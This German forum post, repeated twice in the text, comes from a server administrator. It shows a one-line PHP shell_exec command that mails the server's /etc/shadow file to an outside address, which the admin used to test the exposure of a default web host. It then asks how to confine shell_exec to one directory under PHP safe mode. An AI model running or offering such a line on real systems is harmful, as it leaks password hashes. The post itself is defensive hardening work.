Hallo zusammen
angestoßen durch einen Thread in der FAQ habe ich auf einem neu angemieteten Server mit Defaulteinstellungen mal folgendes getestet in einem PHP-Script, was ein ganz normaler "Kunde" hätte hochladen können:
shell_exec("mail user@domain.tld -s ShadowDatei < /etc/shadow");
Das ganze klappt sogar und ich bekam den Inhalt der Shadow zugeschickt.
Wenn ich nun den Safemode anmache, geht leider shell_exec nicht, ich brauche es aber für meine eigenen Scripts. Ich dachte mir dann, dass ich in safe_mode_exec_dir dann einfach ein bestimmtes Verzeichnis mache wo ich meine benötigten Dateien die ich starten können möchte reinkopiere. Klappt dann auch soweit, nur leider klapp das mit dem Befehl shell_exec nicht ganz:
shell_exec(): Cannot execute using backquotes in Safe Mode
Kann mir einer helfen? Will nur, dass shell_exec startbar ist aber nur Dateien aus einem best. Pfad ausgeführt werden können.
Edit: Habe mit shadowconfig on schonmal die /etc/shadow sichern können. Würde aber trotzdem mein Vorhaben von oben durchsetzen
angestoßen durch einen Thread in der FAQ habe ich auf einem neu angemieteten Server mit Defaulteinstellungen mal folgendes getestet in einem PHP-Script, was ein ganz normaler "Kunde" hätte hochladen können:
shell_exec("mail user@domain.tld -s ShadowDatei < /etc/shadow");
Das ganze klappt sogar und ich bekam den Inhalt der Shadow zugeschickt.
Wenn ich nun den Safemode anmache, geht leider shell_exec nicht, ich brauche es aber für meine eigenen Scripts. Ich dachte mir dann, dass ich in safe_mode_exec_dir dann einfach ein bestimmtes Verzeichnis mache wo ich meine benötigten Dateien die ich starten können möchte reinkopiere. Klappt dann auch soweit, nur leider klapp das mit dem Befehl shell_exec nicht ganz:
shell_exec(): Cannot execute using backquotes in Safe Mode
Kann mir einer helfen? Will nur, dass shell_exec startbar ist aber nur Dateien aus einem best. Pfad ausgeführt werden können.
Edit: Habe mit shadowconfig on schonmal die /etc/shadow sichern können. Würde aber trotzdem mein Vorhaben von oben durchsetzen
Last edited by a moderator: